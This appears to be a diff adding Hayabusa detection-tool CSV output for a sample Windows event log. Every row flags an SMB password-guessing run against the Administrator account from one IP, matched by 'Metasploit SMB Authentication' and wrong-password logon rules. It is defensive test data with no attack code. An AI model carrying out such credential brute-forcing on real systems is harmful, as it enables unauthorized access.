+2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pf7DQVQY7AowT8NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4us3HR9jseQWIHt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJRmgooz8CXjB6E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkjIXxAvEDrPFUpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ENc8aqouBangyUrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7flMdluc8YRhOuzn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WFqeMJIXGDjDP0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iKeRDzfuDCJSv4Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gNEYkgBoG8rAE6SP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vyy1aBvh6lJBs5M5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhiWNroUS5X5AEh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg9rUUIwEfujwCvq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zfvpeyTKc3YYkVkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJGR6CYKLUJp2fWl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cmSap0AJZq0KMRBV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnVCbq1IYZF19oYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVaDMa2uNXTZNcBj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymf6Fhv5ieWwcq73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CT6YMlX1GqeEuAHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FDJ1IFpMNQ2Euhyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EGTzqnHJIiZdSgNk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: epSckAKbAp8qag89  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NNC8ilAuznKPwFvV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wObt647cIBPiVaZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nYDe1L7NNxDGQ0Vt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXroClxv7B0aCTYv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kCVah2QOH1hMSV76  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2HjD65Xy4Hppim2l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwmEQxC4iTcF4aFu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q3QxOH7ok8RR068t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJFj6Ckw1HdK9w52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qqu3Im4HXQNyGnYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bk5dmjQDnpSlREum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pk4BvYgXBR2whf80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6n1su2TUr7ONQr4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: givsEAGfG0smN9Re  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i2YuM0i7a2QuY7xb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xuocQPZpd91adY0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PvGB1dZrfDWyZoqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4oi8iL88rJo7g2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3OUnytXi4NjvqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WKkJcp3TYj31iJUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0E44RVqAE1feU0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny5LCb1qOIUhxOPY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9jcDgzzqH26DjQ1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
